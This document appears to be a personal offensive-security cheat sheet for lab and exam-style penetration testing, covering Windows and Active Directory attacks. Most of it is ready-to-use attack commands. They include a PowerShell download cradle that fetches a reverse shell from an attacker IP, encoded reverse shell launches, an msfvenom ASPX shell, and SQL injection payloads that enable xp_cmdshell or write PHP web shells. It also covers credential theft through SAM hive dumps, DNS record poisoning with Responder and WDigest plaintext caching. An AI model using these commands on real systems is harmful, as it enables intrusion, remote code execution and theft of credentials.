Tricks and Tips

• Lateral Movement techniques - https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/

• Sql Injection cheatsheet - https://www.websec.ca/kb/sql_injection

• Windows directory file extensions are lowercase

• Windows IIS deualt path is c:/inetpub/wwwroot/

• Always use ffuf for fuzzing files and use gobuster for fuzzing directories

• If local privilege escalation exists on windows system for services listening on internal port and exploit is written in python or bash forward that service port and run the exploit in kali.

In active directory environment if we want to pivot to internal windows host from a compromised windows host check if you can receive reverse connection on attacking host on port 53 since AD is usually configured to allow DNS port 53 to communicate to external hosts. eg:

After creating powershell credential object.

Invoke-Command -Computer internal.host.local -Credential $cred -ScriptBlock { tcp-one-liner-from-nishang }

Identify active hosts on network

• sudo nmap -sn <address>/24

• sudo netdiscover -i <interface>

• sudo arp-scan --localnet -I <interface>

Enumerating windows version,hostname,domain

sudo smbmap -H <ip> -v

sudo crackmapexec smb <ip>

Nmap ports scan at faster rate

sudo masscan -p1-65535 10.10.174.58 --rate 10000 -e tun0

Nmap tcp connect scan

nmap -sT -p- --min-rate 5000 <host>

• After this run nmap on individual found ports

Nmap udp verbose scan

nmap -sUV -T4 <ip>

Wordpress verberose scan

wpscan --url sandbox.local --enumerate ap,at,cb,dbe

To find install locations of programs

whereis apache2

Find where log files are located in linux hosts(access.log and error.log)

httpd.conf file in apache tells us where the log files are located so if we donot find log files in default location try getting httpd.conf file 

Error clock skew too great

ntpdate <IP of DC or machine to sync with>

If powershell reverseshell doesn't work convert it to windows base64 and try executing

Since windows does everything in UTF-16 little endian we need to convert our execution code and then base64 it.

echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

Adding DNS entry in AD environment for stealing ntlm hashes

There is something in Active Directory called ADIDNS(Active Directory INtegrated Dns) where AD users can configure computer account objects which they control to point to an arbitary IP address. Now this feature can be leveraged if an attacker who has compromised a regular domain user adds DNS A record ( also known as Address record which indicates ip address of a given domain ) to point to address where responder is listening and if someone visits the address or some script is setup by IT team to check if all the web sites in the AD are up abd running as in intelligence box from hackthebox as shown below.

---

��# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves 
Ted.Graves@intelligence.htb
' -To 'Ted Graves 
Ted.Graves@intelligence.htb
' -Subject "Host: $($record.Name) is down" } } catch {} }

---

Here an attacker who has a regular domain user compromised can add DNS A record pointing to his ip address where responder is listening and since the above script setup by the IT team checks all dns web domains using Invoke-WebRequest their NTLM hash can be stolen. For this we can use https://github.com/Sagar-Jangam/DNSUpdate

python3 DNSUpdate.py -DNS <DC-IP> -u 'htb.local\<username>' -p <password> -a ad -r webalex -d <attacker-ip>

Enabling PS-Remoting

Having an elavated powershell prompt on victim host we can force powershell to work with winrm.

Enable-PSRemoting -Force 
Set-Item wsman:\localhost\client\trustedhosts *

Activating winrm remotely

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

Activating winrm remotely from linux

python3 psexec.py <domain>/<username>:<password>@<DC-ip> 'powershell.exe "Enable-PSRemoting -Force"'

Creating powershell credential object

$username = '<username>'
$password = '<password>'
$secureStringPass = $password | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $secureStringPass

Moving laterally to another computer on domain

Enter-PSSession -ComputerName <computer-name> -Credential <credential created from ps credential object>

Windows shell upload via website

If the windows host is running IIS service and we can upload in any location in the web we may be able to upload an aspx reverse shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f aspx anything.aspx

Decrypt Powershell SecureString password

$password = '01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e1'

[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR( (ConvertTo-SecureString $password) ))

• If we need to transfer binary or executable file via ftp we should always use binary command first then enter put file.exe

If mimikatz doesn't work on the host we can save the sam,system and security hive transfer it to our attacking machine via smb and use secretsdump.py to extract all hashes

reg save hklm\sam c:\windows\temp\sam.save
reg save hklm\security c:\windows\temp\security.save
reg save hklm\system c:\windows\temp\system.save

Windows can execute executable files directly from UNC path

cmd /c \\192.168.119.233\hello\shell.exe

This gets directly executed

To perform tcp port scan On old linux systems where nmap does not run(May need to run more than once to filter good results)

nc -w 1 -zv <ip> 1-65535  2>&1 | grep succeeded

To perform udp port scan on old linux where nmap does not work(May need to run more than once to filter good results)

nc -w 2 -v -u <ip> 1-65535 2>&1 | grep succeeded

Change smb password remotely from linux

smbpasswd -r 10.10.10.193 -U tlavel

Bypass UAC

fodhelper powershell script can be used to bypass UAC only if our compromised user is member of administrator group

Powershell Command History file location

\AppData\Roaming\Microsoft\Windows\Powershell\

If powershell errors during execution of PrivEsc scripts(eg: Access to the path is denied, operation might require other privileges, etc)

• check if the running reverse shell is 64 bit process if the host is 64 bit and 32 bit process if the shell is 32 bit process

[environment]::Is64BitOperatingSystem

[environment]::Is64BitProcess

IF host is 64 bit and our process is 32 bit or vice versa make sure to catch the reverse shell via

C:\WINDOWS\System32\WindowsPowerShell\v1. 0\powershell.exe ...

or upload nc64 to the host and catch the reverse shell or get cmd reverse shell and launch 64 bit powershell from there.

Hashcat with salt

• In the hash file put the format as hash:salt instead of only the hash.

MSSQL configuring xp_cmdshell if not enabled

';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure 'xp_cmdshell', 1;--
';RECONFIGURE;--

MSSQL Injection xp_cmdshell RCE

';EXEC xp_cmdshell 'ping 10.10.14.9';

MSSQL Injection capture credentials when xp_cmdshell doesnot work

';EXEC master..xp_dirtree '\\10.10.14.10\share',1,1;--

MySql Injection RCE in windows when smb is running:

'+UNION+SELECT+NULL,NULL,NULL,NULL,load_file('\\\\10.10.14.9\\share\\reverse-shell.php'),NULL--

MySql injection php wrapper trick

'+UNION+SELECT+NULL,NULL,NULL,NULL,'data://text/plain,<?php+echo+system("whoami")?>',NULL--

MySql Injection OUTFILE RCE:

union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/rev-shell.php'

MySql Injection load_file() read system files

' UNION SELECT NULL,NULL,NULL,load_file('/etc/passwd');--

Wireshark Group

If our compromised user is in (wireshark) group we can sniff any packets on any available interfaces of the comrpomised host. Below we are sniffing on loopback interface and saving the file as test.pcap

[alex@websrv01 ~]$ id
uid1002(alex) gid=1002(alex) groups=1002(alex), 994(wireshark)

[alex@websrv01 ~]$ dumpcap -i lo -w test.pcap

Enabling WDigest authentication to force system to store credentials in plaintext so that next time some employee logs in their creds will get cached in memory

• This technique is usually applied to real world red teaming

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Sqlmap force ssl

Use --force-ssl flag in sqlmap if you are attacking web application using https

sqlmap -u 'https://vulnerable-site.com/index.php?id=1' --force-ssl

Shell as another user on windows host

If we have low privilege access on a windows host and we get credentials or another user or administrator but port 445 is closed externally and we cannot psexec, winrm, rdp or other services are also closed, Enter-PSSession or Invoke-Command -ComputerName didnot work RunasCs or runas.exe also did not work there are another two ways

First Way

We can create a powershell credential object for that user using their password and use Start-Process in powershell with powershell reverse shell to get reverse shell as that user. In compromised host create powershell credential object for that user

$SecPass = ConvertTo-SecureString 'FoundPassword@123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$SecPass)

Now convert Invoke-PowerShellTcpOneLine.ps1 with your ip and port and convert this file to windows base64

cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0

Finally we can start powershell process with our reverse shell in the context of administrator or the found user as

Start-Process -filepath powershell -argumentlist "-enc JABzAG0APQAoAE4AZQ..." -credential $cred

We will receive reverse shell as the compromised user.

Second Way

If port 445, winrm, rdp, or any such port from where we can gain access is listening internally we can forward that port to our local machine and execute psexec.py or evil-winrm, or rdp to get reverse shell or access as another user.